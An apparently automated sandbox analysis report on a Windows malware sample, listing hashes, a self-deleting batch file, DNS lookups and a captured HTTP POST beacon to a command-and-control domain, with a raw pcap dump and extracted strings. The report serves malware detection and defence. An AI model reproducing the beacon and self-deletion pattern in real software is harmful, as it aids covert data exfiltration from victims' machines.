Analysis Date: 2014-09-09 19:47:38
MD5: be7bd46e5e06d525fd592a4875623e91
SHA1: c0168b9215d1ab7ecd71069d068f312684268356

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .4cfd — md5: a3e623463ffbddabb0253bee548ff038 sha1: c73386953a214bd6b011b570ddc4dbf0c5b7318b size: 22016
Section .fcg8 — md5: ef99ffc684660742fb7fa480d0bc1093 sha1: c42b120822d7542dde0d038965e02191fc5b669a size: 14336
Section .gd874 — md5: 2a79d6ef7225df669c19f411e98ff43d sha1: 7cd92adf2a13748c4566a46e7344b09d02c70f08 size: 56320
Section .efdfa — md5: ca06a699c709f8cc152f1251e7e53c35 sha1: f79079e67f63ea4d6916b91340a20e2a489f9d33 size: 3072
Section .rsrc — md5: 4e76faaf68e6a2385613cffd21a37ad2 sha1: 0a750b60ad9921b2e597e330b0ba9fa9547d1eb6 size: 1536
Timestamp (PE header): 2007-06-15 21:57:10
PEhash: 80e11822f6a3b8f255c433fd444f59bfa878b02b
IMPhash: 12dd3737582dcfa2e3821908b63ce70d

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates File: nul
Deletes File: C:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat

Network Details:

DNS: kinoarts.com
Type: A
192.31.186.4
DNS: petroartsstudio.com
Type: A
DNS: greeartsday.com
Type: A
HTTP POST: http://kinoarts.com/report.php?data=v26MmjSySdSkDj907AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzbY+RtufRrKX/N/tqt+7rkA==
User-Agent: wget 3.0
Flows TCP: 192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   536b446a 39303741 55595272 4d375937   SkDj907AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   69424d46 3459476d 4c7a6259 2b527475   iBMF4YGmLzbY+Rtu
0x00000070 (00112)   6652724b 582f4e2f 7471742b 37726b41   fRrKX/N/tqt+7rkA
0x00000080 (00128)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000090 (00144)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x000000a0 (00160)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x000000b0 (00176)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000c0 (00192)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000d0 (00208)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000e0 (00224)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000f0 (00240)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x00000100 (00256)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x00000110 (00272)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000150 (00336)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000160 (00352)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000170 (00368)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000180 (00384)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000190 (00400)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x000001a0 (00416)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x000001b0 (00432)   7248413d 3d                           rHA==


Strings
....
j
AFHFB6B
B09B792
F30G36
G4H1DEC
RC_RCDATA3
RC_RCDATA4
'"""""""""""""""
"""""""""""
"""(""""""_
05C79H
(0p+gt|
0uwvxs
2c11bf4cacc4da649h42h0f
40gag49ah7eddd2fg2885d
5Nfv7D
,6b"b-+
,6b"b\v@
,6b"bV
"6b"@(h
79.gtvSR
7|;qra_N
"""a"""""""&"""
a31hh30b6a6aed70ede730e84f76f7g1fh8b40
advapi32.dll
"""""""""""""""a"""g""" """!"""j""""""
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
&""BZ|D
c1cfa8147feba4d716h2<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
c."""b
CompareStringA
CopyFileA
CopyFileExA
DeleteFileA
DeleteFileW
:dgSlX
DialogBoxParamW
"""e""""C
.efdfa
ExitProcess
ExitThread
"""F0R
`.fcg8
FindClose
FormatMessageA
Fq}ptR
FreeResource
.gd874
GetCPInfo
GetFileType
GetLastError
GetLocalTime
GetStdHandle
GetWindowTextLengthA
GlobalFree
""""""""gR
h+)9KWh
HeapAlloc
H"""fPX
hV[/ ~
HXT`pe
Ii;Bkp
JdxQ8 
kernel32.dll
lstrcatA
lstrcmpA
lstrlenA
=+#@\n
	n)Pk?
p1xk~n
pibH7)t
qScWXn
`"""R\
rdfQ>g
ReadFile
RegCreateKeyA
RegCreateKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegEnumValueA
RegLoadKeyA
RegOpenKeyA
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
R\i_Ks6
@.rsrc
      </security>
      <security>
sW@M(:
\@TBR:6b"@f
!This program cannot be run in DOS mode.
Tl7)1Y
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
tT8`k1
tX`"""bVt
ue-fF5
user32.dll
UxazTV
vL""""BXB
)<v.Yq
w[&%:P
'>}wWC
""""X.
x*H!-0
Xj"""d"""""""d"""g"""""""""""
xJiS$i
x(l\<'
yWtJ`>r(z